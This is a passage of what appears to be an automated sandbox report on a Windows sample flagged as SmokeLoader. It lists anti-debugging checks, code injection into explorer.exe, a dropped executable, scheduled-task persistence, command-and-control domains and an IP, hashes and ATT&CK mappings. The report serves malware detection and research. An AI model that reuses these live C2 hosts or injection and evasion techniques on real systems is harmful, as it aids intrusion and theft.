                Source: explorer.exe, 00000001.00000000.344656957.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A9064 _memset,IsDebuggerPresent,14_2_003A9064
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,10_2_00CE16C7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003AE09A RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,14_2_003AE09A
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE1FA1 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,10_2_00CE1FA1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE1000 GetProcessHeap,RtlAllocateHeap,10_2_00CE1000
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00CE1FA1 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,10_2_00CE1FA1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A8D3B SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_003A8D3B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: jdggfai.1.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeDomain query: r3oidsofsios.com
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E2F380Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E2F380Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E2F380Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E2F380Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E2F380Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E2F380Jump to behavior
                Injects code into the Windows Explorer (explorer.exe)
                Source: C:\Windows\explorer.exeMemory written: PID: 1372 base: E2F380 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 4452 base: 7FF75EDE8150 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 1836 base: E2F380 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 4584 base: 7FF75EDE8150 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 3852 base: E2F380 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 2088 base: E2F380 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 4800 base: E2F380 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 1776 base: 7FF75EDE8150 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 2464 base: E2F380 value: 90Jump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2661A08Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jdggfaiThread created: unknown EIP: 46B1A08Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe16_2_007D10A5
                Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe16_2_007D1016
                Source: explorer.exe, 00000001.00000000.337344155.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.257164062.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.295196336.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000001.00000000.323317074.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.301218048.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.344513618.00000000056F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.293996667.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.337344155.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.256788442.00000000004C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.337344155.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.257164062.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.295196336.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003AE7AC cpuid 14_2_003AE7AC
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_003A8878 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_003A8878
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_031D2297 RtlGetVersion,wsprintfA,15_2_031D2297

                Stealing of Sensitive Information

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4584, type: MEMORYSTR
                Source: Yara matchFile source: 9.2.jdggfai.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.jdggfai.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.jdggfai.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4584, type: MEMORYSTR
                Source: Yara matchFile source: 9.2.jdggfai.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.jdggfai.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.jdggfai.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts12
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium3
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default Accounts1
                Exploitation for Client Execution                		1
                Create Account                		513
                Process Injection                		2
                Obfuscated Files or Information                		LSASS Memory2
                File and Directory Discovery                		Remote Desktop Protocol11
                Input Capture                		Exfiltration Over Bluetooth2
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Software Packing                		Security Account Manager15
                System Information Discovery                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                DLL Side-Loading                		NTDS351
                Security Software Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer113
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                File Deletion                		LSA Secrets131
                Virtualization/Sandbox Evasion                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Masquerading                		Cached Domain Credentials13
                Process Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job513
                Process Injection                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 756298 Sample: file.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 3 other signatures 2->44 7 file.exe 2->7         started        10 jdggfai 2->10         started        process3 signatures4 46 Detected unpacking (changes PE section rights) 7->46 48 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->48 50 Maps a DLL or memory area into another process 7->50 12 explorer.exe 3 7->12 injected 52 Machine Learning detection for dropped file 10->52 54 Checks if the current machine is a virtual machine (disk enumeration) 10->54 56 Creates a thread in another existing process (thread injection) 10->56 process5 dnsIp6 30 r3oidsofsios.com 185.246.221.151, 49715, 49716, 49717 LVLT-10753US Germany 12->30 26 C:\Users\user\AppData\Roaming\jdggfai, PE32 12->26 dropped 28 C:\Users\user\...\jdggfai:Zone.Identifier, ASCII 12->28 dropped 58 System process connects to network (likely due to code injection or exploit) 12->58 60 Benign windows process drops PE files 12->60 62 Injects code into the Windows Explorer (explorer.exe) 12->62 64 3 other signatures 12->64 17 explorer.exe 12->17         started        20 explorer.exe 12->20         started        22 explorer.exe 12->22         started        24 6 other processes 12->24 file7 signatures8 process9 signatures10 32 Found evasive API chain (may stop execution after checking mutex) 17->32 34 Checks if browser processes are running 17->34 36 Contains functionality to compare user and computer (likely to detect sandboxes) 17->36

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe34%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\jdggfai100%Joe Sandbox ML

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.file.exe.5d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.3.jdggfai.6f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.jdggfai.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.3.file.exe.5e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.jdggfai.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                r3oidsofsios.com3%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://xdd42sdfsdf.com/1%VirustotalBrowse
                http://s2scomm20.com/1%VirustotalBrowse
                http://c2csosi228d.com/1%VirustotalBrowse
                http://xdd42sdfsdf.com/0%Avira URL Cloudsafe
                http://s2scomm20.com/0%Avira URL Cloudsafe
                http://c2csosi228d.com/100%Avira URL Cloudmalware
                http://r3oidsofsios.com/Mozilla/5.00%Avira URL Cloudsafe
                http://r3oidsofsios.com/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                r3oidsofsios.com
                		185.246.221.151
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://s2scomm20.com/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://c2csosi228d.com/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://xdd42sdfsdf.com/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://r3oidsofsios.com/false
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://go.mail.ru/searchexplorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpfalse
                  		high
                  http://search.yahoo.com/searchexplorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpfalse
                    		high
                    http://www.google.com/searchexplorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpfalse
                      		high
                      http://nova.rambler.ru/searchexplorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpfalse
                        		high
                        http://r3oidsofsios.com/Mozilla/5.0explorer.exe, 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.408629568.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.508519891.0000000001039000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.509151416.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.414672467.0000000000F50000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.508405258.0000000001268000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.509492375.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.508629995.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.425875513.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://search.aol.com/aol/searchexplorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.246.221.151
                          		r3oidsofsios.comGermany
                          		10753LVLT-10753UStrue

                          General Information

                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:756298
                          Start date and time:2022-11-30 00:10:30 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 8m 1s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:file.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.bank.troj.evad.winEXE@20/3@29/1
                          EGA Information:
                          • Successful, ratio: 90.9%
                          HDC Information:
                          • Successful, ratio: 40.1% (good quality ratio 29.4%)
                          • Quality average: 41%
                          • Quality standard deviation: 31.6%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 64
                          • Number of non-executed functions: 87
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                          • Execution Graph export aborted for target jdggfai, PID 5952 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          00:12:31Task SchedulerRun new task: Firefox Default Browser Agent 3F6E2A49B5A2019A path: C:\Users\user\AppData\Roaming\jdggfai
                          00:12:48API Interceptor329x Sleep call for process: explorer.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          185.246.221.151G6BLxYuvUq.exeGet hashmaliciousBrowse
                          • r3oidsofsios.com/
                          FGBX7XkY6M.exeGet hashmaliciousBrowse
                          • r3oidsofsios.com/
                          ayy8sj4Csb.exeGet hashmaliciousBrowse
                          • r3oidsofsios.com/
                          file.exeGet hashmaliciousBrowse
                          • r3oidsofsios.com/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          r3oidsofsios.comXJXuWlR8TZ.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          c7oqCiKzbF.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          bfBERETDmj.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          G6BLxYuvUq.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          FGBX7XkY6M.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          ayy8sj4Csb.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          Vrg6jBcZUb.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          VwKReACnUP.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          Y1f5Wp27Lx.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          qsu3KRECRS.exeGet hashmaliciousBrowse
                          • 93.189.40.11
                          file.exeGet hashmaliciousBrowse
                          • 35.231.121.61
                          file.exeGet hashmaliciousBrowse
                          • 35.231.121.61

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          LVLT-10753USNcuBv4VKxA.exeGet hashmaliciousBrowse
                          • 193.56.146.194
                          XJXuWlR8TZ.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          file.exeGet hashmaliciousBrowse
                          • 194.180.48.197
                          file.exeGet hashmaliciousBrowse
                          • 37.139.128.51
                          file.exeGet hashmaliciousBrowse
                          • 193.56.146.194
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          c7oqCiKzbF.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          Schwab_Desktop_v2.7.exeGet hashmaliciousBrowse
                          • 185.246.221.54
                          T1M66eTV7y.exeGet hashmaliciousBrowse
                          • 194.180.48.197
                          sFTanL0I8M.exeGet hashmaliciousBrowse
                          • 193.56.146.194
                          eJAL1GSkQP.exeGet hashmaliciousBrowse
                          • 193.56.146.194
                          CtQnbEqNSh.exeGet hashmaliciousBrowse
                          • 185.246.220.212
                          9Enb3RAih1.exeGet hashmaliciousBrowse
                          • 185.246.221.36
                          List_of_items.exeGet hashmaliciousBrowse
                          • 185.246.220.39
                          e4uh4jURKm.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          44krE7RHDt.exeGet hashmaliciousBrowse
                          • 185.252.178.121
                          file.exeGet hashmaliciousBrowse
                          • 193.56.146.194
                          file.exeGet hashmaliciousBrowse
                          • 185.246.221.151
                          (RSV) .xlsGet hashmaliciousBrowse
                          • 185.246.221.36
                          file.exeGet hashmaliciousBrowse
                          • 193.56.146.194

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Roaming\dwgvcre

                          Download File
                          Process:C:\Windows\explorer.exe
                          File Type:data
                          Category:modified
                          Size (bytes):160970
                          Entropy (8bit):7.998679399911187
                          Encrypted:true
                          SSDEEP:3072:Ot6MQNn3XKprOPX+1zMkg7BWTHnMs18vGyMYzZQunMwvY:nN3XMrOv+1zMkg7BWTH1uNZQunbY
                          MD5:3BCD6D6CA7F3787FB48CE0A6ACB9AC0F
                          SHA1:99CC47E2A3229CC1F727AF36607932B562B8EC50
                          SHA-256:39AB690FF5A0633B24065AF986D1DAE4995B57F056776B8BB638833A62FF5B06
                          SHA-512:3CC89A6D55BF632283B2245B288500EFAA9FC75881AC005628971D0C691AA38A2D37F9F343EDC047794A3FD8EA843BF64E1F9302616DBD918BF2D79AF9D44AAD
                          Malicious:false
                          Preview:.2...%.....(.`..."........A~.g......-.......|.-....S.R6g...zow?.-.,yE......X..%....IJT.....~..M.Y..r....Qq.....s...`.....e....U.E.uSl..&WD..2...S.d&x...?#D.a...t...B.O<......Y.}.'.A..N.A.{#I*A.yz...s....M..1m.z.7~.u..*+......&T.x...t....d$..0..x=.(x..It.n....K..*...>15....].G..I.n)+....[%..{:.D....j.].y.U../..i...r.x....h............y.o.K??z.[v........?l.0..q61..C...O..X.m..+...0.L.9!.N...G...J..`.|..C>Y....W._-.^kY.K(....Y..h.F.0.0.d..\P**..{.p.=M,c,..%.}.F.......B.G..Q_24.a.y-.7{7@.Tq.X..,.".F....[..HB.*....P.J....O;........C....O.q......7.+..._.....O|.v.\...........&T..2.u..B..E..l.V.K.....8..+:.C..Y...m..O}..!E.D..g......IVmv.y...3J....#.4l.W6..r......;.X.H....jA..W..8F.$.0.dP..C.u..S.(wq....z..G.....F.6..R.Pa..0x.8."..VT|.....,.[.]..a%*....ZB>B.^.(.....&...jpQ..m.+;T...E..b.7.&....U..=....Nxl#..u.!.Fe..Q.(.H.E`..&.y.".1.!ci.........Z.q....enB......F.u^/.L..O<w..hQ...y.x..8.f.....rW?w.]...........n.L..'..WlR$+p.c....

                          C:\Users\user\AppData\Roaming\jdggfai

                          Download File
                          Process:C:\Windows\explorer.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):148992
                          Entropy (8bit):7.085071601621051
                          Encrypted:false
                          SSDEEP:3072:MDxDtsHGGH2wUp5zjLf0+p+4vrtWhqyXV5G0pbCA:atuH2/jLfM4vr0quk0p/
                          MD5:F39DBBCDCAAC9C8D2039B855C752C214
                          SHA1:AB36DA0A55FEAB685587C52BCE5268FCA7EF0E23
                          SHA-256:12675D0F7C4A8D729EDA453AD01697B0790F2921258E9BEFC54CF9327156AA10
                          SHA-512:44419723FFBDF3CAF47FC0902AFD36BCCFE66AD60C150333FDA1EA62DA6410FBEBB805CCF61278CD95FD48F7BA23EDD06857050AB24D069AB6F3D2A8D1854BB0
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....a.............................L....... ....@.................................G>..........................................P....`..P0...........................................................,..@...............<............................text............................... ..`.data....?... ......................@....rsrc...P0...`...2..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\jdggfai:Zone.Identifier

                          Download File
                          Process:C:\Windows\explorer.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
